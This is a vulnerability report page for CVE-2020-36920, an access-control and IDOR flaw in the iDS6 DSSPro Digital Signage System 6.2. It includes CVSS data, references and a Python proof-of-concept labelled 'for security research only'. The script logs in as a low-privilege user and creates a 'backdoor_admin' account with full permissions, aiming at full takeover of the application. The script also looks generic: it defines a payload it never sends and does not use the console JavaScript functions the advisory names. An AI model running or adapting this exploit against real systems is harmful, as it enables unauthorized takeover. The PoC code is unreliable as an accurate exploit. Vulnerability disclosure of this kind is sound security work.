Security Vulnerability Report
CVE-2020-36920 CVSS 8.8 HIGH

Published: 2026-01-06 16:15:48
Last Modified: 2026-04-15 00:35:42

Description

iDS6 DSSPro Digital Signage System 6.2 contains an improper access control vulnerability that allows authenticated users to elevate privileges through console JavaScript functions. Attackers can create users, modify roles and permissions, and potentially achieve full application takeover by exploiting insecure direct object references.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

iDS6 DSSPro Digital Signage System < 6.2
iDS6 DSSPro Digital Signage System = 6.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2020-36920 PoC - iDS6 DSSPro Privilege Escalation
# Author: VulnCheck
# Type: Improper Access Control / IDOR
import requests
import json

TARGET = "https://vulnerable-ids6-server.com"
USERNAME = "low_privilege_user"
PASSWORD = "user_password"


def exploit():
    # Step 1: Authenticate with low privilege account
    session = requests.Session()
    login_data = {
        "username": USERNAME,
        "password": PASSWORD
    }
    login_resp = session.post(f"{TARGET}/api/auth/login", json=login_data)
    if login_resp.status_code != 200:
        print("[-] Authentication failed")
        return None
    print("[+] Successfully authenticated as low privilege user")

    # Step 2: Exploit console JavaScript functions for privilege escalation
    # Create admin user via insecure direct object reference
    create_user_payload = {
        "username": "backdoor_admin",
        "password": "P@ssw0rd123!",
        "role": "admin",
        "permissions": ["*"],
        "userId": 1  # IDOR - directly referencing admin object
    }
    # Alternative: Modify existing user role via JavaScript console
    escalate_payload = {
        "userId": 2,
        "role": "admin",
        "originalRole": "user"
    }
    # Send request through console JavaScript API
    exploit_resp = session.post(
        f"{TARGET}/api/users/create",
        json=create_user_payload,
        headers={"X-Requested-With": "XMLHttpRequest"}
    )
    if exploit_resp.status_code == 200:
        print("[+] Privilege escalation successful!")
        print("[+] Created admin user: backdoor_admin")
        # Step 3: Login with new admin account
        admin_login = session.post(
            f"{TARGET}/api/auth/login",
            json={"username": "backdoor_admin", "password": "P@ssw0rd123!"}
        )
        if admin_login.status_code == 200:
            print("[+] Full system compromise achieved")
        return session
    else:
        print(f"[-] Exploitation failed: {exploit_resp.status_code}")
        return None


if __name__ == "__main__":
    exploit()
```

References

Raw JSON Data

```json
{"cve": {"id": "CVE-2020-36920", "sourceIdentifier": "[email protected]", "published": "2026-01-06T16:15:48.250", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "iDS6 DSSPro Digital Signage System 6.2 contains an improper access control vulnerability that allows authenticated users to elevate privileges through console JavaScript functions. Attackers can create users, modify roles and permissions, and potentially achieve full application takeover by exploiting insecure direct object references."}, {"lang": "es", "value": "iDS6 DSSPro Digital Signage System 6.2 contiene una vulnerabilidad de control de acceso inadecuado que permite a los usuarios autenticados elevar privilegios a través de funciones JavaScript de consola. Los atacantes pueden crear usuarios, modificar roles y permisos, y potencialmente lograr el control total de la aplicación explotando referencias directas a objetos inseguras."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "references": [{"url": "https://cxsecurity.com/issue/WLB-2020110025", "source": "[email protected]"}, {"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/191260", "source": "[email protected]"}, {"url": "https://packetstorm.news/files/id/159918", "source": "[email protected]"}, {"url": "https://web.archive.org/web/20200919100215/http://www.yerootech.com/", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/48992", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/ids-dsspro-digital-signage-system-privilege-escalation-via-access-control", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5608.php", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/48992", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
```